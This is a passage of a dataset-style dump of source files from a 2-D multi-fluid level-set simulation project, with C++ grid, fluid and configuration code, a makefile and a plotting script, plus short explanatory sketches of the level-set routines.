}\n\n if (min1 * min2 > 0) {\n float avg = (min1 + min2) * 0.5f;\n for (auto &f : fluids) {\n f.phi(i) -= avg;\n }\n }\n }\n}\n\n/** Computes the gradient norm at each point using Godunov's scheme as described\n * in the osher and fedikew book */\nArray2f gradient_norm(Array2f phi, Array2f sigmoid) {\n Array2f gradnorm(phi);\n gradnorm.set(1.0f);\n\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 ij = it.ij();\n if (ij.x < 1 || ij.x >= phi.sx - 1 || ij.y < 1 || ij.y >= phi.sy - 1)\n continue;\n float a = sigmoid(ij);\n float h = phi.h;\n\n float dx = 0;\n float dy = 0;\n\n float dxn = (phi(ij) - phi(ij - vec2(1, 0))) / h;\n float dxp = (phi(ij + vec2(1, 0)) - phi(ij)) / h;\n if (a >= 0) {\n dxn = (dxn > 0) ? dxn * dxn : 0;\n dxp = (dxp < 0) ? dxp * dxp : 0;\n dx = std::max(dxn, dxp);\n } else {\n dxn = (dxn < 0) ? dxn * dxn : 0;\n dxp = (dxp > 0) ? dxp * dxp : 0;\n dx = std::max(dxn, dxp);\n }\n\n float dyn = (phi(ij) - phi(ij - vec2(0, 1))) / h;\n float dyp = (phi(ij + vec2(0, 1)) - phi(ij)) / h;\n if (a >= 0) {\n dyn = (dyn > 0) ? dyn * dyn : 0;\n dyp = (dyp < 0) ? dyp * dyp : 0;\n dy = std::max(dyn, dyp);\n } else {\n dyn = (dyn < 0) ? dyn * dyn : 0;\n dyp = (dyp > 0) ? 
dyp * dyp : 0;\n dy = std::max(dyn, dyp);\n }\n\n gradnorm(ij) = sqrt(dx + dy);\n }\n return gradnorm;\n}\n\nArray2f compute_sigmoid(Array2f phi) {\n Array2f sigmoid(phi);\n sigmoid.clear();\n for (int i = 0; i < phi.size(); i++) {\n sigmoid(i) = phi(i) / sqrt(pow(phi(i), 2.0f) + pow(phi.h, 2.0f));\n }\n return sigmoid;\n}\n\nvoid reinitialize_phi(Fluid &f) {\n Array2f sigmoid = compute_sigmoid(f.phi);\n Array2f gradnorm = gradient_norm(f.phi, sigmoid);\n\n float err = 0;\n float tol = 1e-1;\n int max_iters = 250;\n float dt = 0.5f * f.phi.h;\n\n for (int iter = 0; iter <= max_iters; iter++) {\n // assert(iter != max_iters);\n // apply the update\n for (int i = 0; i < f.phi.size(); i++) {\n f.phi(i) -= sigmoid(i) * (gradnorm(i) - 1.0f) * dt;\n }\n // check updated error\n gradnorm = gradient_norm(f.phi, sigmoid);\n err = 0;\n for (int i = 0; i < f.phi.size(); i++) {\n err += abs(gradnorm(i) - 1.0f);\n }\n err /= static_cast<float>(f.phi.size());\n if (err < tol)\n break;\n }\n}\n\nvoid advect_phi(Array2f &u, Array2f &v, Array2f &phi, float dt) {\n Array2f new_phi(phi);\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 ij = it.ij();\n vec2 world_position = phi.worldspace_of(ij);\n vec2 velocity(u.value_at(world_position), v.value_at(world_position));\n vec2 del_phi = upwind_gradient(phi, velocity, ij);\n new_phi(ij) = phi(ij) - dt * dot(velocity, del_phi);\n }\n phi = new_phi;\n}\n"
},
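The loop in `reinitialize_phi` integrates `phi_t = -S(phi) * (|grad phi| - 1)` until `|grad phi|` is close to 1. Below is a 1-D, self-contained sketch of the same iteration (not repository code; the grid size and iteration count are assumed), using the same smoothed sign function and the same Godunov upwinding as `gradient_norm`, applied to a distance function that starts out twice too steep:

```cpp
// 1-D reinitialization sketch: phi starts as 2x (slope 2) and relaxes
// toward a signed distance function (slope 1) near the interface.
#include <algorithm>
#include <cmath>
#include <cstdio>
#include <vector>

int main() {
  const float h = 0.1f, dt = 0.5f * h;
  const int n = 41;
  std::vector<float> phi(n);
  for (int i = 0; i < n; i++)
    phi[i] = 2.f * ((i - n / 2) * h); // deliberately mis-scaled

  for (int iter = 0; iter < 100; iter++) {
    std::vector<float> next(phi);
    for (int i = 1; i < n - 1; i++) { // endpoints held fixed for brevity
      float s = phi[i] / std::sqrt(phi[i] * phi[i] + h * h); // smoothed sign
      float dn = (phi[i] - phi[i - 1]) / h; // backward difference
      float dp = (phi[i + 1] - phi[i]) / h; // forward difference
      // Godunov's scheme, as in gradient_norm() but in one dimension:
      float g2 = (s >= 0) ? std::max(std::max(dn, 0.f) * std::max(dn, 0.f),
                                     std::min(dp, 0.f) * std::min(dp, 0.f))
                          : std::max(std::min(dn, 0.f) * std::min(dn, 0.f),
                                     std::max(dp, 0.f) * std::max(dp, 0.f));
      next[i] = phi[i] - s * (std::sqrt(g2) - 1.f) * dt;
    }
    phi = next;
  }
  std::printf("phi near interface: %.3f %.3f %.3f (ideal: -0.1 0 0.1)\n",
              phi[n / 2 - 1], phi[n / 2], phi[n / 2 + 1]);
  return 0;
}
```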
{
"alpha_fraction": 0.5879325270652771,
"alphanum_fraction": 0.6033743023872375,
"avg_line_length": 32,
"blob_id": "9be5eec6d015cb5d15c293cb139e4f96b7d27438",
"content_id": "789e194397f0804b23d2c4052c02d3670587c565",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3497,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 106,
"path": "/lib/levelset_constructors.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"fluid.hpp\"\n#include \"json.hpp\"\n#include \"simulation.hpp\"\n#include <glm/gtc/random.hpp>\n#include <string>\n\nusing json = nlohmann::json;\n\n/** \\class FluidConfig\n * A container for a fluid's initial phi conditions.\n * - a string which lets the user choose the shape\n * - three scalar values which describe its transformations\n * - a boolean which negates the phi values\n *\n * supported shapes are: circle, plane */\nstruct FluidConfig {\n std::string name;\n float p1;\n float p2;\n float p3;\n bool negate;\n\n FluidConfig(json j) {\n name = j[\"shape\"].get<std::string>();\n p1 = j[\"property1\"].get<float>();\n p2 = j[\"property2\"].get<float>();\n p3 = j[\"property3\"].get<float>();\n negate = j[\"negate\"].get<bool>();\n assert(name == \"circle\" || name == \"plane\" ||\n name == \"none\"); // TODO replace with enum types\n };\n\n void print_information() {\n printf(\"name: %s\\np1: %f, p2: %f, p3: %f\\n negate: %s\\n\", name.c_str(), p1,\n p2, p3, negate ? \"true\" : \"false\");\n }\n};\n\n/* x1, x2 is a position in space (scaled from 0-1)\n * p1, p2 are the spheres center\n * p3 is the radius\n */\nfloat compute_phi_sphere(vec2 p, FluidConfig &fconf) {\n return distance(p, vec2(fconf.p1, fconf.p2)) - fconf.p3;\n}\n\n/* returns the distance a point is ABOVE a plane.\n * p1 is the planes height (lower)\n * p2 is the planes height (upper)\n * p3 is the jitter quantity\n */\nfloat compute_phi_plane(vec2 p, FluidConfig &fconf) {\n float midpoint = (fconf.p1 + fconf.p2) * 0.5f;\n float radius = (fconf.p1 - fconf.p2) * 0.5f;\n return abs(p.y - (midpoint + linearRand(-fconf.p3, fconf.p3))) - radius;\n}\n\n/** TODO - add documentation and more level set starting configurations */\nvoid construct_levelset(Fluid &f, int sx, int sy, float h, std::string name,\n std::vector<FluidConfig> fluid_phis) {\n f.phi.set((sx + sy) * h);\n\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n vec2 ij = it.ij();\n vec2 scaled_position =\n vec2((static_cast<float>(ij.x) + 0.5f) / static_cast<float>(sx),\n (static_cast<float>(ij.y) + 0.5f) / static_cast<float>(sy));\n float phi_value = 0;\n\n for (auto fconf : fluid_phis) {\n if (fconf.name == \"circle\") {\n phi_value = compute_phi_sphere(scaled_position, fconf);\n } else if (fconf.name == \"plane\") {\n phi_value = compute_phi_plane(scaled_position, fconf);\n } else if (fconf.name == \"none\") {\n phi_value = fconf.negate ? -(f.phi.sx + f.phi.sy) * h\n : (f.phi.sx + f.phi.sy) * h;\n }\n phi_value = fconf.negate ? -phi_value : phi_value;\n f.phi(ij) = min(phi_value, f.phi(ij));\n }\n }\n}\n\n/** returns the distance from a point to a bounding box */\nfloat distance_to_bounds(vec2 position, vec2 lower_bounds, vec2 upper_bounds) {\n float dx =\n min(abs(lower_bounds.x - position.x), abs(position.x - upper_bounds.x));\n float dy =\n min(abs(lower_bounds.y - position.y), abs(position.y - upper_bounds.y));\n return sqrt(dx * dx + dy * dy);\n}\n\n/** Sets the phi value at any point to be no more than the negative distance to\n * the nearest wall */\nvoid fix_levelset_walls(std::vector<Fluid> &fluids, vec2 lower_bounds,\n vec2 upper_bounds) {\n for (auto &f : fluids) {\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n float box_distance =\n distance_to_bounds(it.wp(), lower_bounds, upper_bounds);\n *it = max(-box_distance, *it);\n }\n }\n}"
},
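A hedged usage sketch for `FluidConfig` and `compute_phi_sphere`, assuming `lib/` and the bundled nlohmann `json.hpp` are on the include path (not repository code); the inline JSON mirrors a single `phi` entry as `settings.hpp` reads it from config.json:

```cpp
// Driving FluidConfig by hand with an in-memory JSON object. The values
// (centre 0.5,0.5 and radius 0.25) are assumed examples.
#include "levelset_constructors.hpp"

int main() {
  json j = {{"shape", "circle"},
            {"property1", 0.5},   // centre x (scaled 0-1)
            {"property2", 0.5},   // centre y (scaled 0-1)
            {"property3", 0.25},  // radius
            {"negate", false}};
  FluidConfig fconf(j);
  fconf.print_information();

  // phi < 0 inside the circle, > 0 outside.
  printf("phi at centre: %f\n", compute_phi_sphere(vec2(0.5f, 0.5f), fconf));
  printf("phi at corner: %f\n", compute_phi_sphere(vec2(0.0f, 0.0f), fconf));
  return 0;
}
```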
{
"alpha_fraction": 0.4734693765640259,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 39.83333206176758,
"blob_id": "adfc8823c229a53db6e474b125c2da81f60acca3",
"content_id": "0fc6a38efac10cf98ea735ed4cde5ce3205e801e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 6,
"path": "/docs/search/classes_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['array2',['Array2',['../structArray2.html',1,'']]],\n ['array2_3c_20float_20_3e',['Array2< float >',['../structArray2.html',1,'']]],\n ['array2_3c_20int_20_3e',['Array2< int >',['../structArray2.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.7113164067268372,
"alphanum_fraction": 0.7113164067268372,
"avg_line_length": 32.30769348144531,
"blob_id": "59fee610fc00efff3351e0f51c17926a79dcfa5a",
"content_id": "c2b122a3c7a90884216ae10c3246bdbe295fd75b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/src/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "aux_source_directory(${CMAKE_CURRENT_LIST_DIR} src)\nadd_executable(${PROJECT_NAME} ${src})\n\ntarget_link_libraries(${PROJECT_NAME} ${PROJECT_NAME}lib)\ninclude_directories(${PROJECT_ROOT}/lib)\ninclude_directories(${PROJECT_ROOT}/thirdparty/nlohmann_json)\n\nget_property(dirs\n DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}\n PROPERTY INCLUDE_DIRECTORIES)\nforeach(dir ${dirs})\n message(STATUS \"dir='${dir}'\")\nendforeach()\n"
},
{
"alpha_fraction": 0.5995085835456848,
"alphanum_fraction": 0.6122850179672241,
"avg_line_length": 29.388059616088867,
"blob_id": "93e352362f0d06cbbef6700b4113ce0e3e6463e6",
"content_id": "2a655dcd0331023a60205cdc515a10db8113f886",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2035,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 67,
"path": "/lib/settings.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n/** \\file Loads data from config.json and returns\n parameters for initializing the simulation.\n*/\n\n#include \"json.hpp\"\n#include \"levelset_constructors.hpp\"\n#include \"simulation.hpp\"\n#include <fstream>\n#include <iostream>\n#include <string>\n\n// for convenience\nusing json = nlohmann::json;\n\nvoid initialize_boundaries(Simulation &sim) {\n sim.solid_phi.set(0.5f * sim.solid_phi.h);\n for (int i = 0; i < sim.sx; i++) {\n sim.solid_phi(i, 0) = -0.5;\n sim.solid_phi(i, sim.sy - 1) = -0.5;\n }\n for (int j = 0; j < sim.sy; j++) {\n sim.solid_phi(0, j) = -0.5;\n sim.solid_phi(sim.sx - 1, j) = -0.5;\n }\n}\n\n/** Initializes a simulation based on the json parameters,\n * then adds fluids and sets their starting phis.\n */\nvoid initialize_simulation(Simulation &sim) {\n std::ifstream i(\"config.json\");\n json j;\n i >> j;\n\n int sx = j[\"horizontal_cells\"].get<int>();\n int sy = j[\"vertical_cells\"].get<int>();\n float h = j[\"cell_size\"].get<float>();\n float rt = j[\"runtime\"].get<float>();\n float dt = j[\"timestep\"].get<float>();\n\n // define the computational domain\n sim.init(sx, sy, h, rt, dt);\n\n // load the reactions TODO handle multiple\n auto rxn_json = j[\"reaction\"].get<json>();\n sim.rxn =\n vec4(rxn_json[\"reactant1\"].get<int>() - 1,\n rxn_json[\"reactant2\"].get<int>() - 1,\n rxn_json[\"product\"].get<int>() - 1, rxn_json[\"rate\"].get<float>());\n\n // add each fluid\n for (auto tmp : j[\"fluids\"].get<json>()) {\n sim.add_fluid(tmp[\"density\"].get<float>());\n std::string fluid_name = tmp[\"name\"].get<std::string>();\n std::printf(\"~~ adding %s...\\n\", fluid_name.c_str());\n // then initialize phi\n std::vector<FluidConfig> fluid_phis;\n for (auto p : tmp[\"phi\"].get<json>()) {\n fluid_phis.push_back(FluidConfig(p.get<json>()));\n fluid_phis.back().print_information();\n }\n construct_levelset(sim.fluids.back(), sx, sy, h, fluid_name, fluid_phis);\n }\n initialize_boundaries(sim);\n fix_levelset_walls(sim.fluids, vec2(0, 0), vec2(sx * h, sy * h));\n}"
},
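Conversely, a config file that `initialize_simulation` can read back can be generated with nlohmann::json directly. A sketch with assumed example values (field names are taken from the reads in `settings.hpp`; note that `reactant1 = 0` maps to index `-1`, which disables the reaction path in `project_phi`):

```cpp
// Generating a minimal config.json compatible with initialize_simulation().
// All numeric values here are assumed examples.
#include "json.hpp"
#include <fstream>

using json = nlohmann::json;

int main() {
  json j;
  j["horizontal_cells"] = 64;
  j["vertical_cells"] = 64;
  j["cell_size"] = 0.01;
  j["runtime"] = 2.0;
  j["timestep"] = 0.25;
  // rate <= 0 and zero reactant indices leave reactions switched off.
  j["reaction"] = {{"reactant1", 0}, {"reactant2", 0},
                   {"product", 0},   {"rate", -1.0}};

  json circle = {{"shape", "circle"}, {"property1", 0.5}, {"property2", 0.5},
                 {"property3", 0.2},  {"negate", false}};
  json fluid = {{"name", "water"},
                {"density", 1000.0},
                {"phi", json::array({circle})}};
  j["fluids"] = json::array({fluid});

  std::ofstream out("config.json");
  out << j.dump(2) << "\n";
  return 0;
}
```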
{
"alpha_fraction": 0.520302414894104,
"alphanum_fraction": 0.5365443825721741,
"avg_line_length": 27.12598419189453,
"blob_id": "ca25e47f164d3e9c5c27acb5678ef9f7b337c3e7",
"content_id": "a2b6745c38c3187fdef5303954d131040590d12b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3571,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 127,
"path": "/plot/movie.py",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\nfrom matplotlib.colors import Normalize\nimport matplotlib.cm as cm\nfrom scipy.interpolate import griddata\nimport json\nfrom tqdm import tqdm\n\nphi_location = \"plot/data/phi.txt\"\nvelocity_location = \"plot/data/vel.txt\"\n\n\ndef read_blocks(input_file, i, j):\n \"\"\" Split a data file by newlines/comments. this is used to split our datafile by time\n indexing begins at 0.\"\"\"\n empty_lines = 0\n blocks = []\n for line in open(input_file):\n # Check for empty/commented lines\n if not line or line.startswith('#'):\n # If 1st one: new block\n if empty_lines == 0:\n blocks.append([])\n empty_lines += 1\n # Non empty line: add line in current(last) block\n else:\n empty_lines = 0\n blocks[-1].append(line)\n return blocks[i:j + 1]\n\n\nwith open('config.json') as config_file:\n data = json.load(config_file)\n\nxmax = data['horizontal_cells'] * data['cell_size']\nymax = data['vertical_cells'] * data['cell_size']\nh_cells = data['horizontal_cells']\nv_cells = data['vertical_cells']\nnumber_of_fluids = len(data['fluids'])\n\nphi_datablocks = read_blocks(phi_location, 0, 1000)\nvel_datablocks = read_blocks(velocity_location, 0, 1000)\n\nfor frame in tqdm(range(0, len(phi_datablocks))):\n phi_datablock = phi_datablocks[frame]\n vel_datablock = vel_datablocks[frame]\n\n\n #--------------------------------\n # fluid types\n #--------------------------------\n x, y, z, fluid_id, pressure = np.loadtxt(phi_datablock, unpack=True)\n xi = np.linspace(0.0, xmax, 2 * h_cells)\n yi = np.linspace(0.0, ymax, 2 * v_cells)\n xi, yi = np.meshgrid(xi, yi)\n zi = griddata((x, y), fluid_id, (xi, yi), method='linear')\n\n fig = matplotlib.pyplot.gcf()\n fig.set_size_inches(10,10)\n\n plt.imshow(\n zi,\n origin='lower',\n cmap=cm.Pastel2,\n interpolation='bilinear',\n extent=[\n np.min(x),\n np.max(x),\n np.min(y),\n np.max(y)],\n vmin=0,\n vmax=number_of_fluids\n )\n\n #--------------------------------\n # phi value contour lines\n #--------------------------------\n # boundaryi = griddata((x, y), z, (xi, yi), method='nearest')\n # contour = contour(\n # xi,\n # yi,\n # boundaryi,\n # levels=8,\n # linewidths=1,\n # cmap=cm.RdBu)\n\n #--------------------------------\n # velocity field quiver\n #--------------------------------\n x, y, u, v = np.loadtxt(vel_datablock, unpack=True)\n xii = np.linspace(0.0, xmax, h_cells // 4)\n yii = np.linspace(0.0, ymax, v_cells // 4)\n xii, yii = np.meshgrid(xii, yii)\n ui = griddata((x, y), u, (xii, yii), method='linear')\n vi = griddata((x, y), v, (xii, yii), method='linear')\n\n # plt.set_xlim(0, xmax)\n # plt.set_ylim(0, ymax)\n # plt.set_title(\"t=\" + str(frame))\n # plt.set_aspect(\"equal\")\n plt.axis('off')\n plt.quiver(\n xii,\n yii,\n ui,\n vi,\n np.sqrt(\n ui**2 +\n vi**2),\n angles='xy',\n scale_units='xy',\n scale=10,\n width=0.0015,\n headwidth=2,\n # headlength=1,\n pivot='mid')\n\n # plt.set_title(\"t=\" + str(frame))\n # plt.set_aspect(\"equal\")\n # plt.axis('off')\n\n plt.tight_layout()\n plt.savefig('plot/images/phi{0:05d}.png'.format(frame), bbox_inches='tight')\n plt.clf()\n # print('frame saved to plot/images/phi{0:05d}.png'.format(frame))"
},
{
"alpha_fraction": 0.6148648858070374,
"alphanum_fraction": 0.7567567825317383,
"avg_line_length": 36,
"blob_id": "fe0c79ddc842de6c6a463c680a9cf68476a845f6",
"content_id": "e811557216b67e0785adf0ccbaa658f24d7997ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 4,
"path": "/docs/search/all_2.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['enforce_5fboundaries',['enforce_boundaries',['../classSimulation.html#a616b2ffd9f07cf8e2ee377fa313e5607',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.5789074301719666,
"alphanum_fraction": 0.5910470485687256,
"avg_line_length": 27.06382942199707,
"blob_id": "6d1b22b17a0217f7710204d2f9f223be90a32931",
"content_id": "69d949b6db9a7919d19207a8aae98bcbeb9ec8a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1318,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 47,
"path": "/lib/fluid.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include <algorithm>\n#include <stdio.h>\n\n/** \\class Particle\n * A simple particle class for use in the particle level set method\n */\nclass Particle {\npublic:\n vec2 position;\n float starting_phi;\n float radius;\n bool valid;\n\n Particle(vec2 position_, float starting_phi_, float radius_)\n : position(position_), starting_phi(starting_phi_), radius(radius_) {\n valid = true;\n }\n};\n\n/** \\class Fluid\n * each fluid has its own velocity, pressure, and level set which are\n * then composed by way of \"ghost values\"\n */\nclass Fluid {\npublic:\n float density;\n Array2f phi; // phi, sampled at center\n Array2i particle_count; // counts how many particles are in that area, sampled\n // in the same manner as pls_phi\n\n std::vector<Particle> particles;\n\n Fluid(float density_, int sx_, int sy_, float h) : density(density_) {\n phi.init(sx_, sy_, -0.5, -0.5, h);\n particle_count.init(sx_, sy_, 0.f, 0.f, h);\n }\n /* */\n void print_information() {\n printf(\"~~ Fluid information ~~\\n density: %.3f\\n volume: ~%i%%\\n\", density,\n (int)(100.f *\n (float)count_if(phi.data.begin(), phi.data.end(),\n [](float f) { return f < 0.f; }) /\n (float)phi.size()));\n }\n};"
},
{
"alpha_fraction": 0.701197624206543,
"alphanum_fraction": 0.7095808386802673,
"avg_line_length": 25.5238094329834,
"blob_id": "38318718cfdba91109b8e2d5ebbda79bfbd70963",
"content_id": "2414cf515ef45bf061ae9dbc42036b2c57408097",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1670,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 63,
"path": "/makefile",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "default: build\n\n.PHONY: build\nbuild:\n\trm -rf build/CMakeFiles/gfm.dir\n\t-[[ -f config.json ]] || cp assets/config.json.orig config.json\n\t-[[ -d build ]] || mkdir build\n\tcd build; cmake ..; make -j8\n\n.PHONY: format\nformat:\n\tfind ./lib ./src ./test -iname *.hpp -o -iname *.cpp \\\n\t| xargs clang-format -i\n\tcmake-format -i --command-case canonical --keyword-case upper \\\n\t--enable-sort True --autosort True --enable-markup True \\\n\t./CMakeLists.txt ./src/CMakeLists.txt ./lib/CMakeLists.txt ./test/CMakeLists.txt\n\tautopep8 --in-place --aggressive --aggressive plot/plot.py\n\tpython -m json.tool assets/config.json.orig assets/tmp.json\n\tmv -f assets/tmp.json assets/config.json.orig\n\tpython -m json.tool config.json tmp.json\n\tmv -f tmp.json config.json\n\n.PHONY: clean\nclean:\n\trm -f plot/data/*\n\trm -f plot/images/*\n\trm -rf build/\n\trm -f ./*.gcov\n\trm -f capture.info\n\n.PHONY: run\nrun:\n\tbuild/bin/gfm \n\n.PHONY: test\ntest:\n\tbuild/bin/gfm_test\n\n.PHONY: docs\ndocs:\n\trm -rf docs/ && doxygen .doxyfile\n\n.PHONY: draw\ndraw:\n\tpython plot/plot.py\n\n.PHONY: movie\nmovie:\n\tpython plot/movie.py\n\tffmpeg -r 30 -i plot/images/phi%05d.png -c:v libvpx-vp9 -crf 30 -b:v 0 -y -an video.webm -vf \"pad=ceil(iw/2)*2:ceil(ih/2)*2\"\n\tmpv video.webm\n\n.PHONY: all\nall: clean format build test\n\n#note - this depends on using clang, added this just for testing on the macbook\n.PHONY: profile\nprofile: format clean build\n\tLLVM_PROFILE_FILE=\"code-%p.profraw\" build/bin/gfm\n\tcp -f examples/dam_break.json config.json\n\tLLVM_PROFILE_FILE=\"code-%p.profraw\" build/bin/gfm\n\tllvm-profdata merge -output=code.profdata code-*.profraw\n\tllvm-cov show -format=html -instr-profile code.profdata build/bin/gfm > report.html"
},
{
"alpha_fraction": 0.6327160596847534,
"alphanum_fraction": 0.6574074029922485,
"avg_line_length": 24,
"blob_id": "25514a1947c36d19366d776c9e23091c2f205ccc",
"content_id": "ec8b61fdb6b833749066b3afd55f830b3521300d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 13,
"path": "/lib/velocityfield.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include <glm/glm.hpp>\n\nstruct VelocityField {\n Array2f *up;\n Array2f *vp;\n VelocityField() {}\n VelocityField(Array2f *u_, Array2f *v_) : up(u_), vp(v_) {}\n vec2 operator()(glm::vec2 world_position) {\n return vec2(up->value_at(world_position), vp->value_at(world_position));\n }\n};"
},
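A minimal usage sketch for `VelocityField` (not repository code), assuming `lib/` is on the include path; it mirrors how `Simulation::init` wires `vel.up`/`vel.vp` to the staggered component grids:

```cpp
// Two staggered component grids combined into one callable world-space
// sampler. Grid dimensions, cell size, and field values are assumed.
#include "velocityfield.hpp"
#include <cstdio>

int main() {
  const int sx = 4, sy = 4;
  const float h = 0.25f;
  Array2f u(sx + 1, sy, 0.0f, -0.5f, h); // samples on vertical faces
  Array2f v(sx, sy + 1, -0.5f, 0.0f, h); // samples on horizontal faces
  u.set(1.0f); // uniform rightward flow
  v.set(0.5f); // uniform upward flow

  VelocityField vel(&u, &v);
  vec2 sample = vel(vec2(0.3f, 0.7f)); // bilinear sample at any world point
  std::printf("velocity = (%f, %f)\n", sample.x, sample.y); // (1, 0.5)
  return 0;
}
```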
{
"alpha_fraction": 0.5710327625274658,
"alphanum_fraction": 0.5927351117134094,
"avg_line_length": 29.078702926635742,
"blob_id": "a8f7e445a836ce6a68da8ff736021c0de4e3536e",
"content_id": "9ce1be2579b796f4849840a2e85b5a20f185a9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6497,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 216,
"path": "/lib/array2.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <algorithm>\n#include <glm/glm.hpp>\n#include <vector>\n\nusing namespace glm;\n\n/** \\class Array2\n * A 2d array template with a consistent\n * spatial indexing scheme for use in a collocated\n * grid. For translation between worldspace and gridspace,\n * we use a linear offset. The leastmost worldspace coordinate considered in our\n * universe is (0,0)\n */\ntemplate <class T> struct Array2 {\npublic:\n int sx = 0;\n int sy = 0;\n float offset_x = 0;\n float offset_y = 0;\n float h = 0;\n std::vector<T> data;\n\n /** \\class Array2::iterator\n * iterates through our data vecot\n * call ij() on the iterate to get the index\n */\n class iterator : public std::vector<T>::iterator {\n public:\n Array2<T> const *owner;\n iterator(Array2<T> const *owner, typename std::vector<T>::iterator iter)\n : std::vector<T>::iterator(iter), owner(owner) {}\n using std::vector<T>::iterator::operator++;\n vec2 ij() { return owner->ij_from_index(*this - owner->data.begin()); }\n vec2 wp() { return owner->wp_from_index(*this - owner->data.begin()); }\n };\n iterator begin() { return iterator(this, data.begin()); }\n iterator end() { return iterator(this, data.end()); }\n\n int size() const { return sx * sy; }\n\n /** An empty contructor not intended to be used */\n Array2() {}\n\n /** Equip the grid with dimensions as well as an \"offset\" to foolproof\n * converting from worldspace to gridspace and back */\n Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)\n : sx(sx_), sy(sy_), offset_x(offset_x_), offset_y(offset_y_), h(h_) {\n init();\n }\n\n void init(int sx_, int sy_, float offset_x_, float offset_y_, float h_) {\n sx = sx_;\n sy = sy_;\n offset_x = offset_x_;\n offset_y = offset_y_;\n h = h_;\n init();\n }\n\n /** FIXME creating new vectors might be causing memory leaks on resets\n * Creates a vector to store the grid's elements and clears every value to 0*/\n void init() {\n assert(sx != 0 && sy != 0);\n assert(h != 0);\n data = std::vector<T>(sx * sy);\n clear();\n }\n\n /** Fills the data vector with the input value */\n void set(T val) { std::fill(data.begin(), data.end(), val); }\n\n void clamp(T min, T max) {\n for (auto &d : data) {\n d = glm::clamp(d, min, max);\n }\n }\n\n /** Fills the data vector with 0 casted to the template type */\n void clear() { set(static_cast<T>(0)); }\n\n /** returns direct access to the data vector */\n T &operator()(int i) {\n assert(i >= 0 && i <= sx * sy);\n return data[i];\n }\n\n /** Takes in x and y indice of the grid and returns the value stored at that\n * index. */\n T &operator()(int i, int j) {\n // TODO make sure nothing accesses this incorrectly\n i = i < 0 ? 0 : i;\n i = i > sx - 1 ? sx - 1 : i;\n j = j < 0 ? 0 : j;\n j = j > sy - 1 ? sy - 1 : j;\n assert(i >= 0 && i < sx);\n assert(j >= 0 && j < sy);\n return data[i + (sx * j)];\n }\n\n /** Takes in a vec2 index of the grid and returns the value stored at that\n * index. Note: this .can. beused with any position in grid coordinates */\n T &operator()(glm::vec2 const ij) { return (*this)(ij.x, ij.y); }\n\n /** Takes in some position in world coordinates and returns the *grid*\n * coordinates of that position. 
An example translation is that a\n * center-sampled (eg pressure) value would have offsets -0.5,-0.5 */\n vec2 coordinates_at(vec2 world_coordinates) {\n assert(!std::isnan(world_coordinates.x) &&\n !std::isnan(world_coordinates.y));\n assert(h != 0);\n float i = (world_coordinates.x / h) + offset_x;\n float j = (world_coordinates.y / h) + offset_y;\n if (i < 0)\n i = 0;\n if (j < 0)\n j = 0;\n if (i > sx - 1)\n i = sx - 1;\n if (j > sy - 1)\n j = sy - 1;\n assert(!std::isnan(i) && !std::isnan(j));\n return vec2(i, j);\n }\n\n /** Takes in grid coordinates (eg an index) and returns the worldspace\n * position */\n vec2 worldspace_of(vec2 grid_coordinates) const {\n assert(grid_coordinates.x >= 0 && grid_coordinates.x <= sx - 1);\n assert(grid_coordinates.y >= 0 && grid_coordinates.y <= sy - 1);\n return vec2((grid_coordinates.x - offset_x) * h,\n (grid_coordinates.y - offset_y) * h);\n }\n\n /** converts from a scalar index (indexing the data vector) to a vec2\n * with x and y coordinates */\n vec2 ij_from_index(int index) const {\n assert(index >= 0 && index < sx * sy);\n vec2 ij = 